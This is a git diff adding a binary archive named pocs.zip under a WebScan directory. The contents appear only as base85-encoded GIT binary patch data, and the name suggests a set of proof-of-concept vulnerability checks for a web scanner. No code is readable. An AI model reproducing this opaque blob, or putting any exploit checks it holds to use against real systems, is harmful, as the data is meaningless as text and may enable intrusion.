diff --git a/WebScan/pocs/pocs.zip b/WebScan/pocs/pocs.zip new file mode 100644 index 0000000000000000000000000000000000000000..9e8a1be761ef4723e27f9e4b091c63274dcdbec7 GIT binary patch literal 89914 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%0DlBs)g!s1ThPczAd1I?vah?z?elY=xn zw?fgBL7BG#AdC^fA^mrv9VHCOIATIf(^2Y^g%73^$r57`dq{Q*;a?h4Ti7kt0l%zmuc>j|uUrV#>Rh(ApMHSF zds$iPoEOcVX;8iVl7;V3+3r(wrm~1QqN<~(p(p+Lnu7!9B!6fBT_-njtmQPuDL#>i zzI}nS(O&ntCx0Gl`kSDdnji5XUKDlMwX(@N^Qy;g$%IhQp@rNO&J%0q*T$x={5%c9 